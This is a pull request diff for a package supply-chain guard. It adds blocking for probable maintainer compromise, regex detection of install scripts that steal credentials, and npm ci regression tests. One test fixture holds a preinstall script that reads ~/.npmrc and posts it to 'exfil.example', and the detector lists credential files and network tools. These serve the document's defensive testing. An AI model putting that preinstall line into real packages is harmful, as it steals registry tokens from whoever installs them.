### PR TITLE
feat(supply-chain): harden exploit and ci protections

### DIFF
--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py
@@ -232,6 +232,19 @@ def _is_high_confidence_block(package: SupplyChainBundlePackage) -> bool:
     )
 
 
+def _blocking_bundle_reason(package: SupplyChainBundlePackage) -> str | None:
+    if _is_high_confidence_block(package):
+        return "known_malware_or_kev"
+    if (
+        package.default_action == "block"
+        and package.source_integrity_state == "high-risk"
+        and package.exploit_level in {"active", "elevated"}
+        and package.normalized_severity in {"high", "critical"}
+    ):
+        return "maintainer_compromise"
+    return None
+
+
 def evaluate_cached_supply_chain_bundle(
     response: SupplyChainBundleResponse,
     *,
@@ -261,12 +274,13 @@ def evaluate_cached_supply_chain_bundle(
             stale=stale,
         )
     package = max(matches, key=lambda item: item.risk_score)
-    if _is_high_confidence_block(package):
+    blocking_reason = _blocking_bundle_reason(package)
+    if blocking_reason is not None:
         return OfflineSupplyChainDecision(
             action="block",
             bundle_version=response.bundle.bundle_version,
             matched_advisory_ids=package.related_advisory_ids,
-            reason="known_malware_or_kev",
+            reason=blocking_reason,
             stale=stale,
         )
     if stale:

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -2194,21 +2194,16 @@ def _package_json_install_script_risk(payload: bytes) -> dict[str, str] | None:
         value = scripts.get(key)
         if isinstance(value, str) and value.strip():
             normalized = value.lower()
-            touches_credentials = any(
-                token in normalized
-                for token in (".npmrc", "npm_token", "node_auth_token", "_authtoken", ".pypirc", "pypi_token")
+            touches_credentials = bool(
+                re.search(
+                    r"\b(?:npm_token|node_auth_token|_authtoken|pypi_token)\b|\.npmrc|\.pypirc",
+                    normalized,
+                )
             )
-            exfiltrates = any(
-                token in normalized
-                for token in (
-                    "https.request",
-                    "http.request",
-                    "fetch(",
-                    "axios",
-                    "curl ",
-                    "wget ",
-                    "requests.",
-                    "urllib",
+            exfiltrates = bool(
+                re.search(
+                    r"\b(?:curl|wget|axios|urllib)\b|\bhttps?\.request\b|\bfetch\s*\(|\brequests\.",
+                    normalized,
                 )
             )
             if touches_credentials and exfiltrates:

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -2154,11 +2154,12 @@ def _scan_tarball_archive_bytes(archive_bytes: bytes) -> dict[str, str] | None:
                         "message": "External tarball package manifest exceeded Guard scan limits.",
                         "severity": "high",
                     }
-                if _package_json_has_install_scripts(package_json):
+                install_script_risk = _package_json_install_script_risk(package_json)
+                if install_script_risk is not None:
                     return {
                         "decision": "block",
-                        "code": "tarball_install_script",
-                        "message": "External tarball declares install-time scripts and was blocked.",
+                        "code": install_script_risk["code"],
+                        "message": install_script_risk["message"],
                         "severity": "high",
                     }
     except (tarfile.TarError, OSError, UnicodeDecodeError, ValueError):
@@ -2181,19 +2182,48 @@ def _tarball_member_is_unsafe(member: tarfile.TarInfo) -> bool:
     return False
 
 
-def _package_json_has_install_scripts(payload: bytes) -> bool:
+def _package_json_install_script_risk(payload: bytes) -> dict[str, str] | None:
     try:
         parsed = json.loads(payload.decode("utf-8"))
     except (UnicodeDecodeError, json.JSONDecodeError):
-        return False
+        return None
     scripts = parsed.get("scripts")
     if not isinstance(scripts, dict):
-        return False
+        return None
     for key in ("preinstall", "install", "postinstall", "prepare"):
         value = scripts.get(key)
         if isinstance(value, str) and value.strip():
-            return True
-    return False
+            normalized = value.lower()
+            touches_credentials = any(
+                token in normalized
+                for token in (".npmrc", "npm_token", "node_auth_token", "_authtoken", ".pypirc", "pypi_token")
+            )
+            exfiltrates = any(
+                token in normalized
+                for token in (
+                    "https.request",
+                    "http.request",
+                    "fetch(",
+                    "axios",
+                    "curl ",
+                    "wget ",
+                    "requests.",
+                    "urllib",
+                )
+            )
+            if touches_credentials and exfiltrates:
+                return {
+                    "code": "credential_theft_install_script",
+                    "message": (
+                        "External tarball install script attempts to read local package-manager credentials "
+                        "and exfiltrate them."
+                    ),
+                }
+            return {
+                "code": "tarball_install_script",
+                "message": "External tarball declares install-time scripts and was blocked.",
+            }
+    return None
 
 
 def _lockfile_dependency_versions(
@@ -3457,4 +3487,6 @@ def _bundle_reason_message(
         return f"Cached bundle is stale, so Guard kept {package_label} in monitor mode."
     if reason == "known_malware_or_kev":
         return f"Cached bundle flagged {package_label} from advisory intelligence."
+    if reason == "maintainer_compromise":
+        return f"Cached bundle flagged {package_label} for probable maintainer compromise."
     return f"Cached bundle matched {package_label}."

--- a/tests/test_guard_package_shims.py
+++ b/tests/test_guard_package_shims.py
@@ -183,6 +183,41 @@ def _install_single_manager_shim(
     return Path(str(payload["shim_dir"])) / manager
 
 
+def _write_npm_ci_workspace(workspace_dir: Path, *, package_name: str, package_version: str) -> None:
+    (workspace_dir / "package.json").write_text(
+        json.dumps(
+            {
+                "dependencies": {
+                    package_name: package_version,
+                },
+                "lockfileVersion": 3,
+                "name": "ci-fixture",
+            }
+        ),
+        encoding="utf-8",
+    )
+    (workspace_dir / "package-lock.json").write_text(
+        json.dumps(
+            {
+                "lockfileVersion": 3,
+                "name": "ci-fixture",
+                "packages": {
+                    "": {
+                        "dependencies": {
+                            package_name: package_version,
+                        },
+                        "name": "ci-fixture",
+                    },
+                    f"node_modules/{package_name}": {
+                        "version": package_version,
+                    },
+                },
+            }
+        ),
+        encoding="utf-8",
+    )
+
+
 def test_package_manager_shim_uses_trusted_guard_import_path(tmp_path: Path, capsys) -> None:
     home_dir = tmp_path / "guard-home"
     workspace_dir = tmp_path / "workspace"
@@ -677,3 +712,63 @@ def test_guard_package_shim_preserves_argv_cwd_env_exitcode_and_stdio(tmp_path: 
     assert marker_payload["cwd"] == str(workspace_dir)
     assert marker_payload["shim_var"] == "shim-value"
     assert "fake-manager-stdout" in result.stdout
+
+
+def test_guard_protect_blocks_npm_ci_before_install_from_lockfile(tmp_path: Path) -> None:
+    home_dir = tmp_path / "guard-home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir(parents=True, exist_ok=True)
+    _write_npm_ci_workspace(workspace_dir, package_name="minimist", package_version="1.2.8")
+    _seed_bundle(home_dir=home_dir, ecosystem="npm", package_name="minimist", package_version="1.2.8", action="block")
+    store = GuardStore(home_dir)
+
+    payload, exit_code = build_protect_payload(
+        command=["npm", "ci"],
+        store=store,
+        workspace_dir=workspace_dir,
+        dry_run=True,
+        now="2026-05-19T00:00:00Z",
+        unsafe_raw_output=False,
+    )
+
+    assert exit_code == 2
+    assert payload["executed"] is False
+    assert payload["supply_chain_evaluation"]["decision"] == "block"
+    assert any(
+        package["name"] == "minimist"
+        for package in payload["supply_chain_evaluation"]["packages"]
+    )
+
+
+def test_guard_package_shims_block_npm_ci_before_manager_execution_from_lockfile(
+    tmp_path: Path, capsys
+) -> None:
+    home_dir = tmp_path / "guard-home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir(parents=True, exist_ok=True)
+    _write_npm_ci_workspace(workspace_dir, package_name="minimist", package_version="1.2.8")
+    fake_bin = tmp_path / "fake-bin"
+    fake_bin.mkdir(parents=True, exist_ok=True)
+    marker_path = tmp_path / "npm-ci-marker.json"
+    _write_fake_manager_script(fake_bin=fake_bin, manager="npm", marker_path=marker_path, exit_code=0)
+    _seed_bundle(home_dir=home_dir, ecosystem="npm", package_name="minimist", package_version="1.2.8", action="block")
+    shim_path = _install_single_manager_shim(
+        home_dir=home_dir,
+        workspace_dir=workspace_dir,
+        manager="npm",
+        capsys=capsys,
+    )
+
+    env = dict(os.environ)
+    env["PATH"] = os.pathsep.join(filter(None, [str(fake_bin), env.get("PATH")]))
+    result = subprocess.run(
+        [str(shim_path), "ci"],
+        cwd=workspace_dir,
+        env=env,
+        capture_output=True,
+        text=True,
+        check=False,
+    )
+
+    assert result.returncode != 0
+    assert marker_path.exists() is False

--- a/tests/test_guard_supply_chain_evaluator.py
+++ b/tests/test_guard_supply_chain_evaluator.py
@@ -141,6 +141,7 @@ def _package(
     known_exploited: bool = True,
     malware_state: str = "known",
     namespace: str | None = None,
+    source_integrity_state: str = "high-risk",
     recommended_fix_version: str | None = None,
     risk_score: int = 980,
 ) -> dict[str, object]:
@@ -160,7 +161,7 @@ def _package(
         "recommendedFixVersion": recommended_fix_version,
         "relatedAdvisoryIds": ["GHSA-vh95-rmgr-6w4m"],
         "riskScore": risk_score,
-        "sourceIntegrityState": "high-risk",
+        "sourceIntegrityState": source_integrity_state,
         "version": version,
     }
 
@@ -699,6 +700,37 @@ def test_evaluate_package_request_artifact_blocks_external_tarball_install_scrip
     assert marker_path.exists() is False
 
 
+def test_evaluate_package_request_artifact_blocks_shai_hulud_style_credential_theft_tarball_fixture(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    package_json = json.dumps(
+        {
+            "name": "shai-hulud-fixture",
+            "version": "1.0.0",
+            "scripts": {
+                "preinstall": (
+                    'node -e "const fs=require(\'fs\'); const https=require(\'https\'); '
+                    "const token=fs.readFileSync(process.env.HOME + '/.npmrc','utf8'); "
+                    "const req=https.request({hostname:'exfil.example',method:'POST'}); "
+                    "req.end(token);\""
+                )
+            },
+        }
+    ).encode("utf-8")
+    archive = _tarball_bytes([("package/package.json", package_json)])
+    monkeypatch.setattr(evaluator_module, "_download_external_tarball", lambda *_args, **_kwargs: archive)
+    result = evaluate_package_request_artifact(
+        artifact=_artifact_for_targets("https://packages.example.com/shai-hulud-fixture.tgz"),
+        store=GuardStore(tmp_path / "guard-home"),
+        workspace_dir=tmp_path / "workspace",
+        now="2026-05-19T00:00:00Z",
+    )
+
+    assert result.decision == "block"
+    assert result.policy_action == "block"
+    assert any(reason["code"] == "credential_theft_install_script" for reason in result.reasons)
+
+
 def test_evaluate_package_request_artifact_reviews_clean_external_tarball(
     tmp_path: Path, monkeypatch: pytest.MonkeyPatch
 ) -> None:
@@ -1095,6 +1127,46 @@ def test_evaluate_package_request_artifact_summarizes_multi_package_and_safe_alt
     assert len(result.packages) == 2
     assert "lodash" in result.user_copy.summary.lower()
     assert "1.2.9" in (result.user_copy.next_step or "")
+
+
+def test_evaluate_package_request_artifact_blocks_maintainer_compromise_fixture(
+    tmp_path: Path,
+) -> None:
+    store = GuardStore(tmp_path / "guard-home")
+    store.set_sync_credentials(
+        "https://hol.org/api/guard/receipts/sync", "demo-token", "2026-05-19T00:00:00Z", workspace_id=WORKSPACE_ID
+    )
+    response = _bundle_response(
+        packages=[
+            _package(
+                ecosystem="npm",
+                name="trusted-build-tools",
+                version="5.4.0",
+                default_action="block",
+                exploit_level="elevated",
+                known_exploited=False,
+                malware_state="suspected",
+                normalized_severity="high",
+                recommended_fix_version=None,
+                risk_score=930,
+                source_integrity_state="high-risk",
+            )
+        ]
+    )
+    store.cache_supply_chain_bundle(WORKSPACE_ID, response, "2026-05-19T00:00:00Z")
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+
+    result = evaluate_package_request_artifact(
+        artifact=_artifact_for_targets("trusted-build-tools@5.4.0"),
+        store=store,
+        workspace_dir=workspace_dir,
+        now="2026-05-19T00:00:00Z",
+    )
+
+    assert result.decision == "block"
+    assert result.policy_action == "block"
+    assert any(reason["code"] == "maintainer_compromise" for reason in result.reasons)
 
 
 def test_evaluate_package_request_artifact_blocks_transitive_lockfile_match_with_dependency_path(


### PR DESCRIPTION
## Summary
- close SCRA039 by classifying credential-theft tarball install scripts and adding maintainer-compromise blocking reasons
- close SCRA042 proof gap with explicit `hol-guard protect -- npm ci` and npm-shim `ci` blocking regression coverage

## Testing
- `ruff check`
- `pytest tests/test_guard_supply_chain_evaluator.py tests/test_guard_package_shims.py`
